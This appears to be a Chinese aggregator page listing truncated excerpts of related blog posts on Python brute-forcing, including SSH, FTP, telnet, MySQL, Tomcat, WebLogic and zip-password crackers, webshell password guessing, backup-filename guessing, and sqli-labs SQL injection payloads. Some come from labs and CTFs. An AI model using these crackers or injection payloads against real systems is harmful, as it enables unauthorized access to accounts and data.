python 爆破】的更多相关文章

python 爆破 #!/usr/bin/python #-*- coding: GB2312 -*- #author:loversorry import urllib2 import urllib import os import sys import getopt import base64 def usage(): print sys.argv[0]+" -u [url]http://www.xxx.com/webshell.php[/url] -t php -f ./password.t…
某次测试过程中,发现PHP备份功能代码如下: // 根据时间生成备份文件名 $file_name = 'D' . date('Ymd') . 'T' . date('His'); $sql_file_name = $file_name . '.sql'; 那么形成的文件名格式如:D20180118T101433.sql,理论上是可以爆破的,于是写了一段Python脚本来尝试爆破. Python测试脚本: 简单描述:设置一个开始的时间戳,然后遍历时间戳到当前时间点,得到一个列表,保存的时间格式为“…
最近在提高自己编程能力,拿一些实用的小工具练下.该脚本为python语言,主要涉及模块zipfile,threadings模块. 功能:暴力猜解zip解压密码 #coding: utf-8 import zipfile import threading def zipbp(zfile, pwd): try: zfile.extractall(pwd=pwd) print 'password found : %s' % pwd except: return def main(): zfile =…
def get_pwd(str, num):#str为可选字符集,num为密码长度 if(num == 1): for x in str: yield x else: for x in str: for y in get_pwd(str, num-1): yield x+y strKey=""#可选字符集 for i in range(33,127):#所有可见字符 strKey+=chr(i) for x in get_pwd(strKey,17): #x+="0823}&…
import sys import requests from requests.auth import HTTPBasicAuth def Brute_Force_Web(postData): res = requests.post('http://127.0.0.1/vulnerabilities/burtforce/bf_form.php', data=postData) //使用requests库进行post发包 if "success" in res.text: //检查网页…
前言 本文首发i春秋论坛. 本篇文章主要分享一个python暴破脚本,该脚本采用optparse模块,支持自定义字典位置:用了多线程(虽然我感觉和单线程速度差不多..是我的错觉还是线程写的不对..求表哥们指教). 一.PHP安全编程 这篇文章暴破的目标是自己写的一个简单demo,php写的,用了PDO预编译预防SQLI,用了htmlspecialchars简单防御xss,源码放出来: 数据库配置文件(dbname:pybp;table:pybp_table;column:username,pas…
甲方安全建设之office365邮箱弱口令检测 信息收集 资产范围 资产列表总数是521 抓包后发现只有102 一番测试之后发现控制Response的关键在于MaxEntriesReturned字段,修改后Response达到了期望的结果 正则提取 开源中国在线正则表达式工具 python爆破脚本 import smtplib import os import time # 获取当前时间以命名文件 def file_name(): t = time.strftime('%Y-%m-%d',tim…
目录 二. weblogic弱口令 0. 思路 1. python爆破脚本 2. 技巧 一.weblogic安装 http://www.cnblogs.com/0x4D75/p/8916428.html 二. weblogic弱口令 weblogic常用弱口令https://cirt.net/passwords?criteria=weblogic 后台登陆地址: http://192.168.136.130:7001/console/login/LoginForm.jsp 0. 思路 登陆web…
0X00:前言 sqli-libs是一个学习SQL注入的开源平台,共有75中不同类型的注入.源码可到github上搜索sqli-libs找到 0X01:Page-1基础挑战 0X02:每一关的payloads LV1: id=1' id=1' order by 3-- id=-1' union select 1,2,3--          注:-1 id=-1' union select 1,group_concat(table_name),3 from information_schema.…
1.pilot-logic 题上说password藏在文件里,直接丢到Winhex里,搜索pass就拿到flag了. 有的大佬提供了另一种方法,题上说是一个磁盘文件,有一个处理磁盘文件的软件autopsy,不过这个软件有点大(超过500M),可以直接导入后就能看到flag了. 2.ROT-13变身了 ROT13(回转13位,rotate by 13 places,有时中间加了个连字符称作ROT-13)是一种简易的替换式密码. 原理:(摘自百度百科) 套用ROT13到一段文字上仅仅只需要检查字元字…
近期学习了一段时间python,结合自己的安全从业经验,越来越感觉到安全测试是一个体力活.如果没有良好的coding能力去自动化的话,无疑会把安全测试效率变得很低. 作为安全测试而言,第一步往往要通过爆破目标站的一级域名开始.作为安全而言,最薄弱的地方往往不是主站,而是二级和三级域名.通过大牛lijiejie的工具subdomainsbrute我们可以轻松的获得一个子域名列表和IP的txt文件: www..edu.cn .x.x.x cs..edu.cn .x.x.x my..edu.cn .x…
这个脚本是接地提供的思路,一句话爆破速度提升一千倍,看了他的帖子然而没有看到工具,思路很牛逼,我提供一个Python脚本本地测试了下,十万密码只需要3秒,速度还是可以的 # coding:utf-8 # __author__ : learn import threading,Queue,requests class Add_password: def __init__(self,dictname,queue): self.dictname = dictname self.queue = queu…
python多线程ssh爆破 Python 0x01.About 爆弱口令时候写的一个python小脚本,主要功能是实现使用字典多线程爆破ssh,支持ip表导入,字典数据导入. 主要使用到的是python的paramiko模块和多线程threading模块. 那么,首先要准备的是字典dict.服务器ip表. 东西很简单,主要默认目录如下: |--ssh.scan.py |--/log: sshd |--/dict: ip password ip和password按照一行一个放置. 0x02.Co…
写得时候遇到了一个很大的问题,就是我在发送用户名,接受用户名就会一直卡住.然后等了好久后提示 recv ‘\r\nSession timed out.\r\n\r\nTelnet Server has closed t’ 虚拟机服务器是Win7的 主机客户也是Win7. 原来代码是: 1.一开始觉得是因为socket 设置的问题,上网查了很久,也按他们的方法改了,但都不管用. 2.后来觉得是因为读取行的问题,linux和Windows返回行信息不同,所以没办法读取到,所以将 tn.read_un…
练习写了个SSH弱口令爆破多线程脚本,遇到的问题 1.一开始想import pexpect 中的pxssh 然而却一直该有错误, ImportError: cannot import name spawn google了下问题都说的很模糊也不清楚.有的说是pexpect模块没安装好,有的说是python import的问题,因为在lib中已经有了spawn模块,与pexpect模块中的spawn重名了,所以报错.但也都没说清楚该这么弄.最后在here这里看到了问题原因,原来是pexpect根本不…
初学python, 自己编写了个FTP多线爆破小脚本代码很丑= = #!usr/bin/env python #!coding=utf-8 __author__='zhengjim' from ftplib import FTP import ftplib from threading import Thread def Login(host,username,password): ftp=FTP() try: ftp.connect(host,21,1) ftp.login(username,…
今天来弄一个后台破解的Python小程序,哈哈,直接上代码吧,都有注释~~ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 # -*- coding: utf-8 -*-…
#!/usr/bin/env # coding=UTF-8 import zipfile import threading import os import sys class CrackZip: def __init__(self): self._result = None def run(self,zFile,password): try: zFile.extractall(pwd=password) print("Found Passwd:",password) print('P…
最近在乌云看到一份端口详解:为了锻炼自己,按照端口详解写脚本 #!/usr/local/bin/ python # -*- coding: UTF-8 -*- __author__ = 'yangxiaodi' from multiprocessing import Pool from pexpect import pxssh import sys reload(sys) sys.setdefaultencoding( "utf-8" ) datas=[] def connect():…
1.tomcat 用burpsuit进行弱口令爆破 先抓包 发送到inturder payload type 选择custom iterater 第一个payload选用户名文件,第二个payload用 : 第三个选密码文件 设置base64加密,和去掉URL编码 开始攻击,得到用户名密码 2.用python脚本进行爆破 目前正在学习python, #!/usr/bin/env python # -*- coding: utf-8 -*- #by.really import sys import…
上一篇讲到了如何用Python开发字典,而当我们手里有了字典 就可以进一步去做爆破的任务了,可以用现成的工具,当然也可以自己写 接下来我就要一步一步来写爆破工具! 爆破MySQL: 想要爆破MySQL目标至少要允许远程连接 我这里没有开启远程连接,只是爆破本地的MySQL 实际上,如果掌握了如何爆破本地MySQL,那么想要远程爆破MySQL也是很轻松的 最基本的实现: # -*-coding:utf-8 -*- import pymysql mysql_username = ('root', '…
这里只是分享一下Python如何生成爆破字典 关于爆破工具编写我会在下一篇提到 其实有了爆破字典的话,直接使用Burp,Hydra等一些工具就可以做爆破了! Burp的使用在我以前的博客中有写过,至于Hydra工具就更简单了,百度即可 实例1: 如果我知道某个账户的密码一定是数字并且只有4位(其实这种情况也不少见) 那么我就可以开发一个0000-9999的字典: # -*-coding:utf-8 -*- # 生成密码字典:0000-9999 chars = [ ', ] f = open("d…
源自一个朋友的要求,他的要求是只爆破一个ip,结果出来后就停止,如果是爆破多个,完全没必要停止,等他跑完就好 #!usr/bin/env python #!coding=utf-8 __author__='Akkuman' ''' SSH爆破,由于多线程的问题,我不知道怎么做可以出现结果马上停止(会查的,有更好的方法再改) 现在我的方法是定义了一个全局的信号finish_flag,然后每个线程检查这个信号 线程池用的concurrent.futures.ThreadPoolExecutor,是P…
前言 这里只是分享一下Python如何生成爆破字典,对于简单的一些加密文件,咱们可以跑字典获取正确的密码,比如zip加密文件.这里小编给大家简单的介绍一下爆破字典的方法,希望对大家学习Python有帮助! 基本环境配置 版本:Python3.6 系统:Windows 实例1: 如果我知道某个账户的密码一定是数字并且只有4位(其实这种情况也不少见) 那么我就可以开发一个0000-9999的字典: 运行后就可以在当前目录生成一个dict.txt字典 实例2: 如果我想暴力破解一个Web后台 那么我会…
非阻塞 q.put(item) 写入队列,timeout等待时间 q.put_nowait(item) 相当q.put(item, False) threads多线程     首先导入threading 模块,这是使用多线程的前提 appent 把每个线程放在threads列表里 start 开始 join 主线程等待子线程完成. #!/usr/bin/env python# -*- coding: utf-8 -*- import sysimport requestsimport Queuei…
sys:使用sys模块获得脚本的参数 queue模块,创建一个“队列”对象 time 模块     Python time time() 返回当前时间的时间戳(1970纪元后经过的浮点秒数). find()函数找不到时返回为-1 #!/usr/bin/env python# -*- coding: utf-8 -*- import sysimport requestsimport Queueimport time # 1315935012username = sys.argv[1]passwor…
#coding:utf-8 from optparse import OptionParser import time,re,sys,threading,Queue import ftplib,socket,MySQLdb,paramiko global host queue = Queue.Queue() #******************************************** #color #*****************************************…
snmp用来获取信息,然后利用获取的信息来进一步的渗透. 命令行有 snmpwalk -v 2c -c public ip system -c是密码,默认的密码是public 利用工具可以找windows下的slarwinds的工具包有个叫 ip browser 如果是华为的路由器,好像部分存在漏洞,可以用老外的工具搞搞:https://github.com/grutz/h3c-pt-tools/blob/master/hh3c_cipher.py 参考文章: http://freeloda.b…
最近在乌云看到一份端口详解:为了锻炼自己,按照端口详解写脚本 #!/usr/local/bin/ python #-*- coding: UTF-8 -*- __author__ = '' from ftplib import FTP import ftplib from gevent.pool import Pool threads_count = 20 def read_file(filepath): f = open(filepath).readlines() return f def f…
前言: 整理笔记的时候,发现了weblogic的攻击方法.心里打着算盘看看怎么写 个批量的弱口令爆破脚本.得出了以下思路 思路: 1.利用钟馗之眼采集weblogic的网站,将IP写入到txt 2.添加后台路径,判断是否能成功连接,并且没有过滤表里面的错误.写入到txt 3.转换路径,将后台路径转换为表单请求的路径写入到txt 4.判断是账号和密码是否成功 详细思路请参考:https://www.jianshu.com/p/e97b109ace40 (同时也是一份攻击weblogic服务的好文章…